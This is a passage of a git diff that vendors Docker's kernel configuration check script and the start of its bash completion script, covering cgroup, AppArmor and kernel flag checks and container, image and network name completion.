+cgroupDir="$(dirname "$cgroupSubsystemDir")"
+if [ -d "$cgroupDir/cpu" -o -d "$cgroupDir/cpuacct" -o -d "$cgroupDir/cpuset" -o -d "$cgroupDir/devices" -o -d "$cgroupDir/freezer" -o -d "$cgroupDir/memory" ]; then
+	echo "$(wrap_good 'cgroup hierarchy' 'properly mounted') [$cgroupDir]"
+else
+	if [ "$cgroupSubsystemDir" ]; then
+		echo "$(wrap_bad 'cgroup hierarchy' 'single mountpoint!') [$cgroupSubsystemDir]"
+	else
+		echo "$(wrap_bad 'cgroup hierarchy' 'nonexistent??')"
+	fi
+	EXITCODE=1
+	echo "    $(wrap_color '(see https://github.com/tianon/cgroupfs-mount)' yellow)"
+fi
+
+if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then
+	echo -n '- '
+	if command -v apparmor_parser &> /dev/null; then
+		echo "$(wrap_good 'apparmor' 'enabled and tools installed')"
+	else
+		echo "$(wrap_bad 'apparmor' 'enabled, but apparmor_parser missing')"
+		echo -n '    '
+		if command -v apt-get &> /dev/null; then
+			echo "$(wrap_color '(use "apt-get install apparmor" to fix this)')"
+		elif command -v yum &> /dev/null; then
+			echo "$(wrap_color '(your best bet is "yum install apparmor-parser")')"
+		else
+			echo "$(wrap_color '(look for an "apparmor" package for your distribution)')"
+		fi
+		EXITCODE=1
+	fi
+fi
+
+flags=(
+	NAMESPACES {NET,PID,IPC,UTS}_NS
+	CGROUPS CGROUP_CPUACCT CGROUP_DEVICE CGROUP_FREEZER CGROUP_SCHED CPUSETS MEMCG
+	KEYS
+	VETH BRIDGE BRIDGE_NETFILTER
+	NF_NAT_IPV4 IP_NF_FILTER IP_NF_TARGET_MASQUERADE
+	NETFILTER_XT_MATCH_{ADDRTYPE,CONNTRACK,IPVS}
+	IP_NF_NAT NF_NAT NF_NAT_NEEDED
+
+	# required for bind-mounting /dev/mqueue into containers
+	POSIX_MQUEUE
+)
+check_flags "${flags[@]}"
+if [ "$kernelMajor" -lt 4 ] || [ "$kernelMajor" -eq 4 -a "$kernelMinor" -lt 8 ]; then
+        check_flags DEVPTS_MULTIPLE_INSTANCES
+fi
+
+echo
+
+echo 'Optional Features:'
+{
+	check_flags USER_NS
+	check_distro_userns
+}
+{
+	check_flags SECCOMP
+}
+{
+	check_flags CGROUP_PIDS
+}
+{
+	check_flags MEMCG_SWAP MEMCG_SWAP_ENABLED
+	if  is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then
+		echo "    $(wrap_color '(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")' bold black)"
+	fi
+}
+{
+	if is_set LEGACY_VSYSCALL_NATIVE; then
+		echo -n "- "; wrap_bad "CONFIG_LEGACY_VSYSCALL_NATIVE" 'enabled'
+		echo "    $(wrap_color '(dangerous, provides an ASLR-bypassing target with usable ROP gadgets.)' bold black)"
+	elif is_set LEGACY_VSYSCALL_EMULATE; then
+		echo -n "- "; wrap_good "CONFIG_LEGACY_VSYSCALL_EMULATE" 'enabled'
+	elif is_set LEGACY_VSYSCALL_NONE; then
+		echo -n "- "; wrap_bad "CONFIG_LEGACY_VSYSCALL_NONE" 'enabled'
+		echo "    $(wrap_color '(containers using eglibc <= 2.13 will not work. Switch to' bold black)"
+		echo "    $(wrap_color ' "CONFIG_VSYSCALL_[NATIVE|EMULATE]" or use "vsyscall=[native|emulate]"' bold black)"
+		echo "    $(wrap_color ' on kernel command line. Note that this will disable ASLR for the,' bold black)"
+		echo "    $(wrap_color ' VDSO which may assist in exploiting security vulnerabilities.)' bold black)"
+	# else Older kernels (prior to 3dc33bd30f3e, released in v4.40-rc1) do
+	#      not have these LEGACY_VSYSCALL options and are effectively
+	#      LEGACY_VSYSCALL_EMULATE. Even older kernels are presumably
+	#      effectively LEGACY_VSYSCALL_NATIVE.
+	fi
+}
+
+if [ "$kernelMajor" -lt 4 ] || [ "$kernelMajor" -eq 4 -a "$kernelMinor" -le 5 ]; then
+	check_flags MEMCG_KMEM
+fi
+
+if [ "$kernelMajor" -lt 3 ] || [ "$kernelMajor" -eq 3 -a "$kernelMinor" -le 18 ]; then
+	check_flags RESOURCE_COUNTERS
+fi
+
+if [ "$kernelMajor" -lt 3 ] || [ "$kernelMajor" -eq 3 -a "$kernelMinor" -le 13 ]; then
+	netprio=NETPRIO_CGROUP
+else
+	netprio=CGROUP_NET_PRIO
+fi
+
+flags=(
+	BLK_CGROUP BLK_DEV_THROTTLING IOSCHED_CFQ CFQ_GROUP_IOSCHED
+	CGROUP_PERF
+	CGROUP_HUGETLB
+	NET_CLS_CGROUP $netprio
+	CFS_BANDWIDTH FAIR_GROUP_SCHED RT_GROUP_SCHED
+	IP_VS
+	IP_VS_NFCT
+ 	IP_VS_RR
+)
+check_flags "${flags[@]}"
+
+if ! is_set EXT4_USE_FOR_EXT2; then
+	check_flags EXT3_FS EXT3_FS_XATTR EXT3_FS_POSIX_ACL EXT3_FS_SECURITY
+	if ! is_set EXT3_FS || ! is_set EXT3_FS_XATTR || ! is_set EXT3_FS_POSIX_ACL || ! is_set EXT3_FS_SECURITY; then
+		echo "    $(wrap_color '(enable these ext3 configs if you are using ext3 as backing filesystem)' bold black)"
+	fi
+fi
+
+check_flags EXT4_FS EXT4_FS_POSIX_ACL EXT4_FS_SECURITY
+if ! is_set EXT4_FS || ! is_set EXT4_FS_POSIX_ACL || ! is_set EXT4_FS_SECURITY; then
+	if is_set EXT4_USE_FOR_EXT2; then
+		echo "    $(wrap_color 'enable these ext4 configs if you are using ext3 or ext4 as backing filesystem' bold black)"
+	else
+		echo "    $(wrap_color 'enable these ext4 configs if you are using ext4 as backing filesystem' bold black)"
+	fi
+fi
+
+echo '- Network Drivers:'
+echo '  - "'$(wrap_color 'overlay' blue)'":'
+check_flags VXLAN | sed 's/^/    /'
+echo '      Optional (for encrypted networks):'
+check_flags CRYPTO CRYPTO_AEAD CRYPTO_GCM CRYPTO_SEQIV CRYPTO_GHASH \
+            XFRM XFRM_USER XFRM_ALGO INET_ESP INET_XFRM_MODE_TRANSPORT | sed 's/^/      /'
+echo '  - "'$(wrap_color 'ipvlan' blue)'":'
+check_flags IPVLAN | sed 's/^/    /'
+echo '  - "'$(wrap_color 'macvlan' blue)'":'
+check_flags MACVLAN DUMMY | sed 's/^/    /'
+
+# only fail if no storage drivers available
+CODE=${EXITCODE}
+EXITCODE=0
+STORAGE=1
+
+echo '- Storage Drivers:'
+echo '  - "'$(wrap_color 'aufs' blue)'":'
+check_flags AUFS_FS | sed 's/^/    /'
+if ! is_set AUFS_FS && grep -q aufs /proc/filesystems; then
+	echo "      $(wrap_color '(note that some kernels include AUFS patches but not the AUFS_FS flag)' bold black)"
+fi
+[ "$EXITCODE" = 0 ] && STORAGE=0
+EXITCODE=0
+
+echo '  - "'$(wrap_color 'btrfs' blue)'":'
+check_flags BTRFS_FS | sed 's/^/    /'
+check_flags BTRFS_FS_POSIX_ACL | sed 's/^/    /'
+[ "$EXITCODE" = 0 ] && STORAGE=0
+EXITCODE=0
+
+echo '  - "'$(wrap_color 'devicemapper' blue)'":'
+check_flags BLK_DEV_DM DM_THIN_PROVISIONING | sed 's/^/    /'
+[ "$EXITCODE" = 0 ] && STORAGE=0
+EXITCODE=0
+
+echo '  - "'$(wrap_color 'overlay' blue)'":'
+check_flags OVERLAY_FS | sed 's/^/    /'
+[ "$EXITCODE" = 0 ] && STORAGE=0
+EXITCODE=0
+
+echo '  - "'$(wrap_color 'zfs' blue)'":'
+echo -n "    - "; check_device /dev/zfs
+echo -n "    - "; check_command zfs
+echo -n "    - "; check_command zpool
+[ "$EXITCODE" = 0 ] && STORAGE=0
+EXITCODE=0
+
+EXITCODE=$CODE
+[ "$STORAGE" = 1 ] && EXITCODE=1
+
+echo
+
+check_limit_over()
+{
+	if [ $(cat "$1") -le "$2" ]; then
+		wrap_bad "- $1" "$(cat $1)"
+		wrap_color "    This should be set to at least $2, for example set: sysctl -w kernel/keys/root_maxkeys=1000000" bold black
+		EXITCODE=1
+	else
+		wrap_good "- $1" "$(cat $1)"
+	fi
+}
+
+echo 'Limits:'
+check_limit_over /proc/sys/kernel/keys/root_maxkeys 10000
+echo
+
+exit $EXITCODE
diff --git a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS
new file mode 100644
index 0000000000..03ee2dde3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS
@@ -0,0 +1,2 @@
+Tianon Gravi <admwiggin@gmail.com> (@tianon)
+Jessie Frazelle <jess@docker.com> (@jfrazelle)
diff --git a/vendor/github.com/docker/docker/contrib/completion/bash/docker b/vendor/github.com/docker/docker/contrib/completion/bash/docker
new file mode 100644
index 0000000000..7ea5d9a9f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/completion/bash/docker
@@ -0,0 +1,4282 @@
+#!/bin/bash
+#
+# bash completion file for core docker commands
+#
+# This script provides completion of:
+#  - commands and their options
+#  - container ids and names
+#  - image repos and tags
+#  - filepaths
+#
+# To enable the completions either:
+#  - place this file in /etc/bash_completion.d
+#  or
+#  - copy this file to e.g. ~/.docker-completion.sh and add the line
+#    below to your .bashrc after bash completion features are loaded
+#    . ~/.docker-completion.sh
+#
+# Configuration:
+#
+# For several commands, the amount of completions can be configured by
+# setting environment variables.
+#
+# DOCKER_COMPLETION_SHOW_CONTAINER_IDS
+# DOCKER_COMPLETION_SHOW_NETWORK_IDS
+# DOCKER_COMPLETION_SHOW_NODE_IDS
+# DOCKER_COMPLETION_SHOW_PLUGIN_IDS
+# DOCKER_COMPLETION_SHOW_SECRET_IDS
+# DOCKER_COMPLETION_SHOW_SERVICE_IDS
+#   "no"  - Show names only (default)
+#   "yes" - Show names and ids
+#
+# You can tailor completion for the "events", "history", "inspect", "run",
+# "rmi" and "save" commands by settings the following environment
+# variables:
+#
+# DOCKER_COMPLETION_SHOW_IMAGE_IDS
+#   "none" - Show names only (default)
+#   "non-intermediate" - Show names and ids, but omit intermediate image IDs
+#   "all" - Show names and ids, including intermediate image IDs
+#
+# DOCKER_COMPLETION_SHOW_TAGS
+#   "yes" - include tags in completion options (default)
+#   "no"  - don't include tags in completion options
+
+#
+# Note:
+# Currently, the completions will not work if the docker daemon is not
+# bound to the default communication port/socket
+# If the docker daemon is using a unix socket for communication your user
+# must have access to the socket for the completions to function correctly
+#
+# Note for developers:
+# Please arrange options sorted alphabetically by long name with the short
+# options immediately following their corresponding long form.
+# This order should be applied to lists, alternatives and code blocks.
+
+__docker_previous_extglob_setting=$(shopt -p extglob)
+shopt -s extglob
+
+__docker_q() {
+	docker ${host:+-H "$host"} ${config:+--config "$config"} 2>/dev/null "$@"
+}
+
+# __docker_containers returns a list of containers. Additional options to
+# `docker ps` may be specified in order to filter the list, e.g.
+# `__docker_containers --filter status=running`
+# By default, only names are returned.
+# Set DOCKER_COMPLETION_SHOW_CONTAINER_IDS=yes to also complete IDs.
+# An optional first option `--id|--name` may be used to limit the
+# output to the IDs or names of matching items. This setting takes
+# precedence over the environment setting.
+__docker_containers() {
+	local format
+	if [ "$1" = "--id" ] ; then
+		format='{{.ID}}'
+		shift
+	elif [ "$1" = "--name" ] ; then
+		format='{{.Names}}'
+		shift
+	elif [ "${DOCKER_COMPLETION_SHOW_CONTAINER_IDS}" = yes ] ; then
+		format='{{.ID}} {{.Names}}'
+	else
+		format='{{.Names}}'
+	fi
+	__docker_q ps --format "$format" "$@"
+}
+
+# __docker_complete_containers applies completion of containers based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# Additional filters may be appended, see `__docker_containers`.
+__docker_complete_containers() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_containers "$@")" -- "$current") )
+}
+
+__docker_complete_containers_all() {
+	__docker_complete_containers "$@" --all
+}
+
+__docker_complete_containers_running() {
+	__docker_complete_containers "$@" --filter status=running
+}
+
+__docker_complete_containers_stopped() {
+	__docker_complete_containers "$@" --filter status=exited
+}
+
+__docker_complete_containers_unpauseable() {
+	__docker_complete_containers "$@" --filter status=paused
+}
+
+__docker_complete_container_names() {
+	local containers=( $(__docker_q ps -aq --no-trunc) )
+	local names=( $(__docker_q inspect --format '{{.Name}}' "${containers[@]}") )
+	names=( "${names[@]#/}" ) # trim off the leading "/" from the container names
+	COMPREPLY=( $(compgen -W "${names[*]}" -- "$cur") )
+}
+
+__docker_complete_container_ids() {
+	local containers=( $(__docker_q ps -aq) )
+	COMPREPLY=( $(compgen -W "${containers[*]}" -- "$cur") )
+}
+
+__docker_images() {
+	local images_args=""
+
+	case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in
+		all)
+			images_args="--no-trunc -a"
+			;;
+		non-intermediate)
+			images_args="--no-trunc"
+			;;
+	esac
+
+	local repo_print_command
+	if [ "${DOCKER_COMPLETION_SHOW_TAGS:-yes}" = "yes" ]; then
+		repo_print_command='print $1; print $1":"$2'
+	else
+		repo_print_command='print $1'
+	fi
+
+	local awk_script
+	case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in
+		all|non-intermediate)
+			awk_script='NR>1 { print $3; if ($1 != "<none>") { '"$repo_print_command"' } }'
+			;;
+		none|*)
+			awk_script='NR>1 && $1 != "<none>" { '"$repo_print_command"' }'
+			;;
+	esac
+
+	__docker_q images $images_args | awk "$awk_script" | grep -v '<none>$'
+}
+
+__docker_complete_images() {
+	COMPREPLY=( $(compgen -W "$(__docker_images)" -- "$cur") )
+	__ltrim_colon_completions "$cur"
+}
+
+__docker_complete_image_repos() {
+	local repos="$(__docker_q images | awk 'NR>1 && $1 != "<none>" { print $1 }')"
+	COMPREPLY=( $(compgen -W "$repos" -- "$cur") )
+}
+
+__docker_complete_image_repos_and_tags() {
+	local reposAndTags="$(__docker_q images | awk 'NR>1 && $1 != "<none>" { print $1; print $1":"$2 }')"
+	COMPREPLY=( $(compgen -W "$reposAndTags" -- "$cur") )
+	__ltrim_colon_completions "$cur"
+}
+
+# __docker_networks returns a list of all networks. Additional options to
+# `docker network ls` may be specified in order to filter the list, e.g.
+# `__docker_networks --filter type=custom`
+# By default, only names are returned.
+# Set DOCKER_COMPLETION_SHOW_NETWORK_IDS=yes to also complete IDs.
+# An optional first option `--id|--name` may be used to limit the
+# output to the IDs or names of matching items. This setting takes
+# precedence over the environment setting.
+__docker_networks() {
+	local format
+	if [ "$1" = "--id" ] ; then
+		format='{{.ID}}'
+		shift
+	elif [ "$1" = "--name" ] ; then
+		format='{{.Name}}'
+		shift
+	elif [ "${DOCKER_COMPLETION_SHOW_NETWORK_IDS}" = yes ] ; then
+		format='{{.ID}} {{.Name}}'
+	else
+		format='{{.Name}}'
+	fi
+	__docker_q network ls --format "$format" "$@"
+}
+
+# __docker_complete_networks applies completion of networks based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# Additional filters may be appended, see `__docker_networks`.
+__docker_complete_networks() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_networks "$@")" -- "$current") )
+}
+
+__docker_complete_containers_in_network() {
+	local containers=$(__docker_q network inspect -f '{{range $i, $c := .Containers}}{{$i}} {{$c.Name}} {{end}}' "$1")
+	COMPREPLY=( $(compgen -W "$containers" -- "$cur") )
+}
+
+# __docker_volumes returns a list of all volumes. Additional options to
+# `docker volume ls` may be specified in order to filter the list, e.g.
+# `__docker_volumes --filter dangling=true`
+# Because volumes do not have IDs, this function does not distinguish between
+# IDs and names.
+__docker_volumes() {
+	__docker_q volume ls -q "$@"
+}
+
+# __docker_complete_volumes applies completion of volumes based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# Additional filters may be appended, see `__docker_volumes`.
+__docker_complete_volumes() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_volumes "$@")" -- "$current") )
+}
+
+# __docker_plugins_bundled returns a list of all plugins of a given type.
+# The type has to be specified with the mandatory option `--type`.
+# Valid types are: Network, Volume, Authorization.
+# Completions may be added or removed with `--add` and `--remove`
+# This function only deals with plugins that come bundled with Docker.
+# For plugins managed by `docker plugin`, see `__docker_plugins_installed`.
+__docker_plugins_bundled() {
+	local type add=() remove=()
+	while true ; do
+		case "$1" in
+			--type)
+				type="$2"
+				shift 2
+				;;
+			--add)
+				add+=("$2")
+				shift 2
+				;;
+			--remove)
+				remove+=("$2")
+				shift 2
+				;;
+			*)
+				break
+				;;
+		esac
+	done
+
+	local plugins=($(__docker_q info | sed -n "/^Plugins/,/^[^ ]/s/ $type: //p"))
+	for del in "${remove[@]}" ; do
+		plugins=(${plugins[@]/$del/})
+	done
+	echo "${plugins[@]} ${add[@]}"
+}
+
+# __docker_complete_plugins_bundled applies completion of plugins based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# The plugin type has to be specified with the next option `--type`.
+# This function only deals with plugins that come bundled with Docker.
+# For completion of plugins managed by `docker plugin`, see
+# `__docker_complete_plugins_installed`.
+__docker_complete_plugins_bundled() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_plugins_bundled "$@")" -- "$current") )
+}
+
+# __docker_plugins_installed returns a list of all plugins that were installed with
+# the Docker plugin API.
+# By default, only names are returned.
+# Set DOCKER_COMPLETION_SHOW_PLUGIN_IDS=yes to also complete IDs.
+# For built-in pugins, see `__docker_plugins_bundled`.
+__docker_plugins_installed() {
+	local fields
+	if [ "$DOCKER_COMPLETION_SHOW_PLUGIN_IDS" = yes ] ; then
+		fields='$1,$2'
+	else
+		fields='$2'
+	fi
+	__docker_q plugin ls | awk "NR>1 {print $fields}"
+}
+
+# __docker_complete_plugins_installed applies completion of plugins that were installed
+# with the Docker plugin API, based on the current value of `$cur` or the value of
+# the optional first option `--cur`, if given.
+# For completion of built-in pugins, see `__docker_complete_plugins_bundled`.
+__docker_complete_plugins_installed() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_plugins_installed "$@")" -- "$current") )
+}
+
+__docker_runtimes() {
+	__docker_q info | sed -n 's/^Runtimes: \(.*\)/\1/p'
+}
+
+__docker_complete_runtimes() {
+	COMPREPLY=( $(compgen -W "$(__docker_runtimes)" -- "$cur") )
+}
+
+# __docker_secrets returns a list of all secrets.
+# By default, only names of secrets are returned.
+# Set DOCKER_COMPLETION_SHOW_SECRET_IDS=yes to also complete IDs of secrets.
+__docker_secrets() {
+	local fields='$2'  # default: name only
+	[ "${DOCKER_COMPLETION_SHOW_SECRET_IDS}" = yes ] && fields='$1,$2' # ID and name
+
+	__docker_q secret ls | awk "NR>1 {print $fields}"
+}
+
+# __docker_complete_secrets applies completion of secrets based on the current value
+# of `$cur`.
+__docker_complete_secrets() {
+	COMPREPLY=( $(compgen -W "$(__docker_secrets)" -- "$cur") )
+}
+
+# __docker_stacks returns a list of all stacks.
+__docker_stacks() {
+	__docker_q stack ls | awk 'NR>1 {print $1}'
+}
+
+# __docker_complete_stacks applies completion of stacks based on the current value
+# of `$cur` or the value of the optional first option `--cur`, if given.
+__docker_complete_stacks() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_stacks "$@")" -- "$current") )
+}
+
+# __docker_nodes returns a list of all nodes. Additional options to
+# `docker node ls` may be specified in order to filter the list, e.g.
+# `__docker_nodes --filter role=manager`
+# By default, only node names are returned.
+# Set DOCKER_COMPLETION_SHOW_NODE_IDS=yes to also complete node IDs.
+# An optional first option `--id|--name` may be used to limit the
+# output to the IDs or names of matching items. This setting takes
+# precedence over the environment setting.
+# Completions may be added with `--add`, e.g. `--add self`.
+__docker_nodes() {
+	local add=()
+	local fields='$2'  # default: node name only
+	[ "${DOCKER_COMPLETION_SHOW_NODE_IDS}" = yes ] && fields='$1,$2' # ID and name
+
+	while true ; do
+		case "$1" in
+			--id)
+				fields='$1' # IDs only
+				shift
+				;;
+			--name)
+				fields='$2' # names only
+				shift
+				;;
+			--add)
+				add+=("$2")
+				shift 2
+				;;
+			*)
+				break
+				;;
+		esac
+	done
+
+	echo $(__docker_q node ls "$@" | tr -d '*' | awk "NR>1 {print $fields}") "${add[@]}"
+}
+
+# __docker_complete_nodes applies completion of nodes based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# Additional filters may be appended, see `__docker_nodes`.
+__docker_complete_nodes() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_nodes "$@")" -- "$current") )
+}
+
+__docker_complete_nodes_plus_self() {
+	__docker_complete_nodes --add self "$@"
+}
+
+# __docker_services returns a list of all services. Additional options to
+# `docker service ls` may be specified in order to filter the list, e.g.
+# `__docker_services --filter name=xxx`
+# By default, only node names are returned.
+# Set DOCKER_COMPLETION_SHOW_SERVICE_IDS=yes to also complete IDs.
+# An optional first option `--id|--name` may be used to limit the
+# output to the IDs or names of matching items. This setting takes
+# precedence over the environment setting.
+__docker_services() {
+	local fields='$2'  # default: service name only
+	[ "${DOCKER_COMPLETION_SHOW_SERVICE_IDS}" = yes ] && fields='$1,$2' # ID & name
+
+	if [ "$1" = "--id" ] ; then
+		fields='$1' # IDs only
+		shift
+	elif [ "$1" = "--name" ] ; then
+		fields='$2' # names only
+		shift
+	fi
+        __docker_q service ls "$@" | awk "NR>1 {print $fields}"
+}
+
+# __docker_complete_services applies completion of services based on the current
+# value of `$cur` or the value of the optional first option `--cur`, if given.
+# Additional filters may be appended, see `__docker_services`.
+__docker_complete_services() {
+	local current="$cur"
+	if [ "$1" = "--cur" ] ; then
+		current="$2"
+		shift 2
+	fi
+	COMPREPLY=( $(compgen -W "$(__docker_services "$@")" -- "$current") )
+}
+
+# __docker_append_to_completions appends the word passed as an argument to every
+# word in `$COMPREPLY`.
+# Normally you do this with `compgen -S` while generating the completions.
+# This function allows you to append a suffix later. It allows you to use
+# the __docker_complete_XXX functions in cases where you need a suffix.
+__docker_append_to_completions() {
+	COMPREPLY=( ${COMPREPLY[@]/%/"$1"} )
+}
+
+# __docker_is_experimental tests whether the currently configured Docker daemon
+# runs in experimental mode. If so, the function exits with 0 (true).
+# Otherwise, or if the result cannot be determined, the exit value is 1 (false).
+__docker_is_experimental() {
+	[ "$(__docker_q version -f '{{.Server.Experimental}}')" = "true" ]
+}
+
+# __docker_pos_first_nonflag finds the position of the first word that is neither
+# option nor an option's argument. If there are options that require arguments,
+# you should pass a glob describing those options, e.g. "--option1|-o|--option2"
+# Use this function to restrict completions to exact positions after the argument list.
+__docker_pos_first_nonflag() {
+	local argument_flags=$1
+
+	local counter=$((${subcommand_pos:-${command_pos}} + 1))
+	while [ $counter -le $cword ]; do
+		if [ -n "$argument_flags" ] && eval "case '${words[$counter]}' in $argument_flags) true ;; *) false ;; esac"; then
+			(( counter++ ))
+			# eat "=" in case of --option=arg syntax
+			[ "${words[$counter]}" = "=" ] && (( counter++ ))
+		else
+			case "${words[$counter]}" in
+				-*)
+					;;
+				*)
+					break
+					;;
+			esac
+		fi
+
+		# Bash splits words at "=", retaining "=" as a word, examples:
+		# "--debug=false" => 3 words, "--log-opt syslog-facility=daemon" => 4 words
+		while [ "${words[$counter + 1]}" = "=" ] ; do
+			counter=$(( counter + 2))
+		done
+
+		(( counter++ ))
+	done
+
+	echo $counter
+}
+
+# __docker_map_key_of_current_option returns `key` if we are currently completing the
+# value of a map option (`key=value`) which matches the extglob given as an argument.
+# This function is needed for key-specific completions.
+__docker_map_key_of_current_option() {
+	local glob="$1"
+
+	local key glob_pos
+	if [ "$cur" = "=" ] ; then        # key= case
+		key="$prev"
+		glob_pos=$((cword - 2))
+	elif [[ $cur == *=* ]] ; then     # key=value case (OSX)
+		key=${cur%=*}
+		glob_pos=$((cword - 1))
+	elif [ "$prev" = "=" ] ; then
+		key=${words[$cword - 2]}  # key=value case
+		glob_pos=$((cword - 3))
+	else
+		return
+	fi
+
+	[ "${words[$glob_pos]}" = "=" ] && ((glob_pos--))  # --option=key=value syntax
+
+	[[ ${words[$glob_pos]} == @($glob) ]] && echo "$key"
+}
+
+# __docker_value_of_option returns the value of the first option matching `option_glob`.
+# Valid values for `option_glob` are option names like `--log-level` and globs like
+# `--log-level|-l`
+# Only positions between the command and the current word are considered.
+__docker_value_of_option() {
+	local option_extglob=$(__docker_to_extglob "$1")
+
+	local counter=$((command_pos + 1))
+	while [ $counter -lt $cword ]; do
+		case ${words[$counter]} in
+			$option_extglob )
+				echo ${words[$counter + 1]}
+				break
+				;;
+		esac
+		(( counter++ ))
+	done
+}
+
+# __docker_to_alternatives transforms a multiline list of strings into a single line
+# string with the words separated by `|`.
+# This is used to prepare arguments to __docker_pos_first_nonflag().
+__docker_to_alternatives() {
+	local parts=( $1 )
+	local IFS='|'
+	echo "${parts[*]}"
+}
+
+# __docker_to_extglob transforms a multiline list of options into an extglob pattern
+# suitable for use in case statements.
+__docker_to_extglob() {
+	local extglob=$( __docker_to_alternatives "$1" )
+	echo "@($extglob)"
+}
+
+# __docker_subcommands processes subcommands
+# Locates the first occurrence of any of the subcommands contained in the
+# first argument. In case of a match, calls the corresponding completion
+# function and returns 0.
+# If no match is found, 1 is returned. The calling function can then
+# continue processing its completion.
+#
+# TODO if the preceding command has options that accept arguments and an
+# argument is equal ot one of the subcommands, this is falsely detected as
+# a match.
+__docker_subcommands() {
+	local subcommands="$1"
+
+	local counter=$(($command_pos + 1))
+	while [ $counter -lt $cword ]; do
+		case "${words[$counter]}" in
+			$(__docker_to_extglob "$subcommands") )
+				subcommand_pos=$counter
+				local subcommand=${words[$counter]}
+				local completions_func=_docker_${command}_${subcommand}
+				declare -F $completions_func >/dev/null && $completions_func
+				return 0
+				;;
+		esac
+		(( counter++ ))
+	done
+	return 1
+}
+
+# __docker_nospace suppresses trailing whitespace
+__docker_nospace() {
+	# compopt is not available in ancient bash versions
+	type compopt &>/dev/null && compopt -o nospace
+}
+
+__docker_complete_resolved_hostname() {
+	command -v host >/dev/null 2>&1 || return
+	COMPREPLY=( $(host 2>/dev/null "${cur%:}" | awk '/has address/ {print $4}') )
+}
+
+__docker_local_interfaces() {
+	command -v ip >/dev/null 2>&1 || return
+	ip addr show scope global 2>/dev/null | sed -n 's| \+inet \([0-9.]\+\).* \([^ ]\+\)|\1 \2|p'
+}
+
+__docker_complete_local_interfaces() {
+	local additional_interface
+	if [ "$1" = "--add" ] ; then
+		additional_interface="$2"
+	fi
+
+	COMPREPLY=( $( compgen -W "$(__docker_local_interfaces) $additional_interface" -- "$cur" ) )
+}
+
+__docker_complete_capabilities() {
+	# The list of capabilities is defined in types.go, ALL was added manually.
+	COMPREPLY=( $( compgen -W "
+		ALL
+		AUDIT_CONTROL
+		AUDIT_WRITE
+		AUDIT_READ
+		BLOCK_SUSPEND
+		CHOWN
+		DAC_OVERRIDE
+		DAC_READ_SEARCH
+		FOWNER
+		FSETID
+		IPC_LOCK
+		IPC_OWNER
+		KILL
+		LEASE
+		LINUX_IMMUTABLE
+		MAC_ADMIN
+		MAC_OVERRIDE
+		MKNOD
+		NET_ADMIN
+		NET_BIND_SERVICE
+		NET_BROADCAST
+		NET_RAW
+		SETFCAP
+		SETGID
+		SETPCAP
+		SETUID
+		SYS_ADMIN
+		SYS_BOOT
+		SYS_CHROOT
+		SYSLOG
+		SYS_MODULE
+		SYS_NICE
+		SYS_PACCT
+		SYS_PTRACE
+		SYS_RAWIO
+		SYS_RESOURCE
+		SYS_TIME
+		SYS_TTY_CONFIG
+		WAKE_ALARM
+	" -- "$cur" ) )
+}
+
+__docker_complete_detach-keys() {
+	case "$prev" in
+		--detach-keys)
+			case "$cur" in
+				*,)
+					COMPREPLY=( $( compgen -W "${cur}ctrl-" -- "$cur" ) )
+					;;
+				*)
+					COMPREPLY=( $( compgen -W "ctrl-" -- "$cur" ) )
+					;;
+			esac
+
+			__docker_nospace
+			return
+			;;
+	esac
+	return 1
+}
+
+__docker_complete_isolation() {
+	COMPREPLY=( $( compgen -W "default hyperv process" -- "$cur" ) )
+}
+
+__docker_complete_log_drivers() {
+	COMPREPLY=( $( compgen -W "
+		awslogs
+		etwlogs
+		fluentd
+		gcplogs
+		gelf
+		journald
+		json-file
+		logentries
+		none
+		splunk
+		syslog
+	" -- "$cur" ) )
+}
+
+__docker_complete_log_options() {
+	# see docs/reference/logging/index.md
+	local awslogs_options="awslogs-region awslogs-group awslogs-stream"
+	local fluentd_options="env fluentd-address fluentd-async-connect fluentd-buffer-limit fluentd-retry-wait fluentd-max-retries labels tag"
+	local gcplogs_options="env gcp-log-cmd gcp-project labels"
+	local gelf_options="env gelf-address gelf-compression-level gelf-compression-type labels tag"
+	local journald_options="env labels tag"
+	local json_file_options="env labels max-file max-size"
+	local logentries_options="logentries-token"
+	local syslog_options="env labels syslog-address syslog-facility syslog-format syslog-tls-ca-cert syslog-tls-cert syslog-tls-key syslog-tls-skip-verify tag"
+	local splunk_options="env labels splunk-caname splunk-capath splunk-format splunk-gzip splunk-gzip-level splunk-index splunk-insecureskipverify splunk-source splunk-sourcetype splunk-token splunk-url splunk-verify-connection tag"
+
+	local all_options="$fluentd_options $gcplogs_options $gelf_options $journald_options $logentries_options $json_file_options $syslog_options $splunk_options"
+
+	case $(__docker_value_of_option --log-driver) in
+		'')
